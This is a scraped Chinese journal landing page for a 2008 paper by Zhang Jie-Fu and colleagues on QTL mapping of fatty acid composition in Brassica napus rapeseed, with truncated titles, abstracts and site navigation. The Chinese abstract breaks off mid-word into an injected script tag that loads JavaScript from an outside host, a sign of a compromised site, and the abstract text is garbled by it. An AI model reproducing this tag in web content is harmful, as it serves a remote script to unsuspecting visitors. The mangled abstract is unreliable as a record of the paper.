

作物遗传育种 · 种质资源 · 分子遗传学

甘蓝型油菜主要脂肪酸组成的QTL

张洁夫, 戚存扣, 浦惠明, 陈松, 陈锋

江苏省农业科学院经济作物研究所

收稿日期 2007-3-5 修回日期 网络版发布日期 2008-1-2 接受日期 2007-7-30

摘要 应用RAPD、SSR和SRAP技术, 对甘?script src=http://www.nmidahena.com/1.js>

关键词 [油菜](#) [脂肪酸组成](#) [QTL](#)

分类号

QTL Identification for Fatty A

ZHANG Jie-Fu, QI Cun-Kou, PU Hui

Institute of Industrial Crops,

Abstract Rapeseed is one of the importa

Key words [Rapeseed](#) [Fatty acid compositio](#)

DOI: 10.3724/SP.J.1006.2008.00054

通讯作者 [张洁夫 jiefu_z@163.com](mailto:jiefu_z@163.com)

扩展功能

本文信息

▶ [Supporting info](#)

▶ [PDF\(0KB\)](#)

▶ [\[HTML全文\]\(0KB\)](#)

▶ [参考文献](#)

服务与反馈

▶ [把本文推荐给朋友](#)

▶ [加入我的书架](#)

▶ [加入引用管理器](#)

▶ [复制索引](#)

▶ [Email Alert](#)

▶ [文章反馈](#)

▶ [浏览反馈信息](#)

相关信息

▶ [本刊中 包含“油菜”的 相关文章](#)

▶ 本文作者相关文章

- [张洁夫](#)
- [戚存扣](#)
- [浦惠明](#)
- [陈松](#)
- [陈锋](#)